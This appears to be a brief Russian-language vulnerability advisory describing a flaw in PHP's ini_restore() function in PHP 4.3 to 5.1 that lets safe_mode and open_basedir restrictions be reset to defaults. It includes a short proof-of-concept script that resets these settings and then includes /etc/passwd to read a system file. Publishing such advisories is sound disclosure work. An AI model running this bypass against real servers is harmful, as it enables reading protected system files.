• Партнер

  • Программа:
    PHP 4.3.x
    PHP 4.4.x
    PHP 5.0.x
    PHP 5.1.x

    Уязвимость позволяет удаленному пользователю обойти существующие механизмы безопасности на целевой системе. Уязвимость существует из-за ошибки в функции "ini_restore()". Локальный злоумышленник может передать специально сформированный данные в уязвимую функцию, что позволит сбросить определенные настройки безопасности в значения по умолчанию в конфигурационном файле php.ini.

    Пример:

    <?
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include("/etc/passwd");
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include("/etc/passwd");
    ?>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии